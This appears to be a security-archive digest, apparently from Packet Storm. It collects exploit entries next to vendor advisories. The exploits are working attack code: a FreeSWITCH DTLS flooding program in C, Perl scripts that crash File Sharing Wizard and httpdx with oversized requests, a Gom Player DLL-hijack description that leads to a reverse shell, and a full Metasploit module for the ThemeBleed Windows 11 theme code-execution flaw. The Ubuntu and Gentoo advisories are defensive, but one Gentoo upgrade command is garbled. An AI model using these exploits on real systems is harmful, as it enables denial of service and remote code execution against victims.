Gom Player version 2.3.92.5362 suffers from a dll hijacking vulnerability.

    # Exploit Title: Gom Player 2.3.92.5362 - nvcuda.dll DLL Hijacking# Date: 2023-01-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.mrvar0x.com/# Version: 2.3.92.5362# Tested on: Windows 7, Windows 10A DLL hijacking vulnerability has been discovered Gom Player 2.3.92.5362. When a user loads the application it will try to load nvcuda.dll missing DLL from the same directory. Using a crafted DLL from MSFVENOM, it is possible to execute arbitrary code in the context of the current logged in user.Gom Player 2.3.92.5362 can also load any malicious DLL with any given name from any directory wihtout proper checking the loaded DLL for example. Open Gom Player -- Settings -- Filter/Codec -- Render Filter -- Advanced rendering method -- Add- Browse -- Then loaded lol.dll which is generated by MSFVENOM and it will execute a reverse shell

Gom Player 2.3.92.5362 DLL Hijacking

FreeSWITCH versions prior to 1.10.11 remote denial of service exploit that leverages a race condition in the hello handshake phase of the DTLS protocol.

    #include <stdio.h#include <string.h>#include <unistd.h>#include <openssl/ssl.h>#include <openssl/err.h>#define IP "127.0.0.1"#define PORT 5061int main() {    SSL_library_init();    SSL_load_error_strings();    OpenSSL_add_ssl_algorithms();    const SSL_METHOD *method = TLS_server_method();    SSL_CTX *ctx = SSL_CTX_new(method);    if (!ctx) {        fprintf(stderr, "Unable to create SSL context\n");        ERR_print_errors_fp(stderr);        return 1;    }    SSL *ssl = SSL_new(ctx);    if (!ssl) {        fprintf(stderr, "Unable to create SSL\n");        ERR_print_errors_fp(stderr);        return 1;    }    if (SSL_set_fd(ssl, fileno(stdin)) <= 0) {        fprintf(stderr, "Unable to set SSL file descriptor\n");        ERR_print_errors_fp(stderr);        return 1;    }    if (SSL_set_connect_state(ssl) <= 0) {        fprintf(stderr, "Unable to set SSL connect state\n");        ERR_print_errors_fp(stderr);        return 1;    }    const SSL_CIPHER *cipher = SSL_CIPHER_find("TLS_NULL_WITH_NULL_NULL");    if (!cipher) {        fprintf(stderr, "Unable to find cipher\n");        ERR_print_errors_fp(stderr);        return 1;    }    SSL_set_cipher_list(ssl, "TLS_NULL_WITH_NULL_NULL");    if (SSL_connect(ssl) <= 0) {        fprintf(stderr, "Unable to connect\n");        ERR_print_errors_fp(stderr);        return 1;    }    printf("Connected with cipher %s\n", SSL_CIPHER_get_name(SSL_get_current_cipher(ssl)));    // Send malicious ClientHello messages continuously    while (1) {        if (SSL_connect(ssl) <= 0) {            fprintf(stderr, "Unable to connect\n");            ERR_print_errors_fp(stderr);            return 1;        }        sleep(1);    }    SSL_shutdown(ssl);    SSL_free(ssl);    SSL_CTX_free(ctx);    EVP_cleanup();    return 0;}

FreeSWITCH Denial Of Service

File Sharing Wizard version 1.5.0 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 07 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: File Sharing Wizard 1.5.0  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1gPiMU0Wemdx-rxEzAPhQCyparn1JiX0j/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $exploit = "\x41"x1360;

    my $payload_header  = "GET " . $exploit;  
    $payload_header .= " HTTP/1.0\r\n\r\n";

    my $connect = IO::Socket::INET->new(  
       PeerAddr => $ip,  
       PeerPort => $port,  
       Proto    => 'tcp'  
    ) or die "Unable to connect to the victim: $!\n";

    $connect->send($payload_header);  
    close $connect;

    print "[+] Done! Exploited!\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           File Sharing Wizard 1.5.0 - Denied of Service       #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

File Sharing Wizard 1.5.0 Denial Of Service

httpdx version 1.5.4 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: httpdx 1.5.4 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 06 january 2024  
# Vendor Homepage:  http://httpdx.sourceforge.net  
# Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/  
# Download 2 to demo:https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: httpdx 1.5.4 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

   my $sock = IO::Socket::INET->new("$ip:$port");

   my $exploit = "\x41"x1040;

   print $sock "POST /index2.html HTTP/1.0\r\n" .   
    "Content-Length: 1023\r\n" .   
    "Content-Type: html\r\n" .   
    "Host: $ip" . "\r\n" .  
    "\r\n" .  
    $exploit;

                print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

httpdx 1.5.4 Denial Of Service

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Wireshark Analyzer 4.2.2

When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file's PACKME_VERSION is 999, it then attempts to load an accompanying dll file ending in _vrf.dll. Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Remote::SMB::Server::Share  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',        'Description' => %q{          When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the          msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll          file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed.  It does this by          opening the file for reading and verifying the signature before opening the file for execution.          Because this action is performed in two discrete operations, it opens the procedure for a time of check to          time of use vulnerability.  By embedding a UNC file path to an SMB server we control, the SMB server can          serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name          when the host intends to load/execute the dll.        },        'DisclosureDate' => '2023-09-13',        'Author' => [          'gabe_k', # Discovery/PoC          'bwatters-r7', # msf exploit          'Spencer McIntyre' # msf exploit        ],        'References' => [          ['CVE', '2023-38146'],          ['URL', 'https://exploits.forsale/themebleed/'],          ['URL', 'https://github.com/gabe-k/themebleed/tree/main']        ],        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => ARCH_X64,        'Targets' => [          [ 'Windows', {} ],        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],          'AKA' => ['ThemeBleed']        },        'DefaultOptions' => { 'DisablePayloadHandler' => false }      )    )    register_options([      OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),      OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),      OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])    ])    deregister_options(      'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity      'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity      'FOLDER_NAME'    )  end  def file_format_filename    datastore['THEME_FILE_NAME']  end  def setup    super    @file = File.binread(datastore['STYLE_FILE'])    begin      pe = Rex::PeParsey::Pe.new_from_string(@file)    rescue Rex::PeParsey::PeError => e      fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")    end    unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)      fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')    end    @file_version_offset = pe.rva_to_file_offset(rva)    @file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']    @file_name << '.msstyles' unless @file_name.end_with?('.msstyles')  end  def primer    payload_dll = generate_payload_dll    max_length = [payload_dll.length, @file.length].max    # make sure that the lengths are the same by padding the smaller to the length of the larger    @file.ljust(max_length, "\x00".b)    payload_dll.ljust(max_length, "\x00".b)    virtual_disk = service.shares[@share]    @service = service    virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)    virtual_disk.add(virtual_file)    # install this hook for create requests to set the thread-local file content    virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|      next unless request.name.read_now!.encode.ends_with?('_vrf.dll')      if request.desired_access.execute == 1        virtual_file.tl_content = payload_dll      else        virtual_file.tl_content = @file      end      nil    end    file_create(make_theme)  end  def get_file_contents(client:)    print_status("Sending file to #{client.peerhost}")    new_version = [999].pack('v')    @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]  end  def make_theme    <<~THEME      [Theme]      DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060      [Control Panel\\Desktop]      Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg      TileWallpaper=0      WallpaperStyle=10      [VisualStyles]      Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}      ColorStyle=NormalColor      Size=NormalSize      [MasterThemeSelector]      MTSM=RJSPBS    THEME  end  class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile    def initialize(*args, **kwargs)      super      @default_content = @content      @tl_content = {}      @tl_content.compare_by_identity    end    def open(mode = 'r', &block)      @content = tl_content      super    end    def tl_content=(content)      @tl_content[Thread.current] = content    end    def tl_content      @tl_content.fetch(Thread.current, @default_content)    end  endend

Themebleed Windows 11 Themes Arbitrary Code Execution

Ubuntu Security Notice 6549-4 - It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel did not properly initialize a policy data structure, leading to an out-of-bounds vulnerability. A local privileged attacker could use this to cause a denial of service or possibly expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6549-4  
January 05, 2024

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms

Details:

It was discovered that the USB subsystem in the Linux kernel contained a  
race condition while handling device descriptors in certain situations,  
leading to a out-of-bounds read vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-37453)

Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel did not properly initialize a policy data structure, leading  
to an out-of-bounds vulnerability. A local privileged attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information (kernel memory). (CVE-2023-3773)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate some attributes passed from userspace. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly expose sensitive information (kernel memory). (CVE-2023-39189)

Sunjoo Park discovered that the netfilter subsystem in the Linux kernel did  
not properly validate u32 packets content, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39192)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate SCTP data, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39193)

Lucas Leong discovered that the Netlink Transformation (XFRM) subsystem in  
the Linux kernel did not properly handle state filters, leading to an out-  
of-bounds read vulnerability. A privileged local attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-39194)

It was discovered that a race condition existed in QXL virtual GPU driver  
in the Linux kernel, leading to a use after free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-39198)

Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did  
not properly handle socket buffers (skb) when performing IP routing in  
certain circumstances, leading to a null pointer dereference vulnerability.  
A privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-42754)

Jason Wang discovered that the virtio ring implementation in the Linux  
kernel did not properly handle iov buffers in some situations. A local  
attacker in a guest VM could use this to cause a denial of service (host  
system crash). (CVE-2023-5158)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel  
did not properly handle queue initialization failures in certain  
situations, leading to a use-after-free vulnerability. A remote attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5178)

Budimir Markovic discovered that the perf subsystem in the Linux kernel did  
not properly handle event groups, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-5717)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1046-intel-iotg  5.15.0-1046.52  
   linux-image-intel-iotg          5.15.0.1046.46

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6549-4  
   https://ubuntu.com/security/notices/USN-6549-1  
   CVE-2023-37453, CVE-2023-3773, CVE-2023-39189, CVE-2023-39192,  
   CVE-2023-39193, CVE-2023-39194, CVE-2023-39198, CVE-2023-42754,  
   CVE-2023-5158, CVE-2023-5178, CVE-2023-5717

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1046.52

Ubuntu Security Notice USN-6549-4

Gentoo Linux Security Advisory 202401-6 - A vulnerability has been found in CUPS filters where remote code execution is possible via the beh filter. Versions greater than or equal to 1.28.17-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: CUPS filters: Remote Code Execution  
     Date: January 05, 2024  
     Bugs: #906944  
       ID: 202401-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in CUPS filters where remote code  
execution is possible via the beh filter.

Background  
=========  
CUPS filters provides backends, filters, and other software that was  
once part of the core CUPS distribution.

Affected packages  
================  
Package                 Vulnerable    Unaffected  
----------------------  ------------  -------------  
net-print/cups-filters  < 1.28.17-r2  >= 1.28.17-r2

Description  
==========  
A vulnerability has been discovered in cups-filters. Please review the  
CVE identifier referenced below for details.

Impact  
=====  
If you use beh to create an accessible network printer, this security  
vulnerability can cause remote code execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All cups-filters users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-print/cups-filters-1.28.17-r2"

References  
=========  
[ 1 ] CVE-2023-24805  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24805  
[ 2 ] GHSA-gpxc-v2m8-fr3x

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-06

Gentoo Linux Security Advisory 202401-5 - A vulnerability has been found in RDoc which allows for command injection. Versions greater than or equal to 6.3.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: RDoc: Command Injection  
     Date: January 05, 2024  
     Bugs: #801301  
       ID: 202401-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in RDoc which allows for command  
injection.

Background  
=========  
RDoc produces HTML and command-line documentation for Ruby projects.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-ruby/rdoc  < 6.3.2       >= 6.3.2

Description  
==========  
A vulnerability has been discovered in RDoc. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
RDoc used to call Kernel#open to open a local file. If a Ruby project  
has a file whose name starts with | and ends with tags, the command  
following the pipe character is executed. A malicious Ruby project could  
exploit it to run an arbitrary command execution against a user who  
attempts to run the rdoc command.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All RDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-ruby/rdoc-6.3.2"

References  
=========  
[ 1 ] CVE-2021-31799  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31799

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-05

Gentoo Linux Security Advisory 202401-4 - Several vulnerabilities have been found in WebKitGTK+, the worst of which can lead to remote code execution. Versions greater than or equal to 2.42.3:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: January 05, 2024  
     Bugs: #907818, #909663, #910656, #918087, #918099, #919290  
       ID: 202401-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Several vulnerabilities have been found in WebKitGTK+, the worst of  
which can lead to remote code execution.

Background  
=========  
WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.42.3:4    >= 2.42.3:4  
                                   >= 2.42.3:4.1  
                                   >= 2.42.3:6

Description  
==========  
Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All WebKitGTK+ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.42.3"

References  
=========  
[ 1 ] CVE-2023-28198  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28198  
[ 2 ] CVE-2023-28204  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28204  
[ 3 ] CVE-2023-32370  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32370  
[ 4 ] CVE-2023-32373  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32373  
[ 5 ] CVE-2023-32393  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32393  
[ 6 ] CVE-2023-32439  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32439  
[ 7 ] CVE-2023-37450  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37450  
[ 8 ] CVE-2023-38133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38133  
[ 9 ] CVE-2023-38572  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38572  
[ 10 ] CVE-2023-38592  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38592  
[ 11 ] CVE-2023-38594  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38594  
[ 12 ] CVE-2023-38595  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38595  
[ 13 ] CVE-2023-38597  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38597  
[ 14 ] CVE-2023-38599  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38599  
[ 15 ] CVE-2023-38600  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38600  
[ 16 ] CVE-2023-38611  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38611  
[ 17 ] CVE-2023-40397  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40397  
[ 18 ] CVE-2023-42916  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42916  
[ 19 ] CVE-2023-42917  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42917  
[ 20 ] WSA-2023-0006  
      https://webkitgtk.org/security/WSA-2023-0006.html

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-04

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm